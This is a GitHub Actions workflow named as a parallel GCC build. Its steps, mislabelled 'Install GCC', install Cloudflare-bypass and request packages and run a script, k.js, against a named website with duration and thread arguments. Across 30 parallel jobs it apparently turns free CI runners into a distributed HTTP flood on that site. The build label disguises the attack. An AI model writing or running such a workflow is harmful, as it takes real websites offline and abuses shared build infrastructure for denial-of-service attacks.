name: Parallel GCC Jobs 100+

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  build-and-run:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        job-number: [1,2,3,4,5,6,7,8,9,10,
                     11,12,13,14,15,16,17,18,19,20,
                     21,22,23,24,25,26,27,28,29,30]
    name: Job ${{ matrix.job-number }}
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Install GCC
        run: npm install cloudscraper request randomstring
      - name: Install GCC
        run: node k.js https://doffybee.com/ 300 8 h1
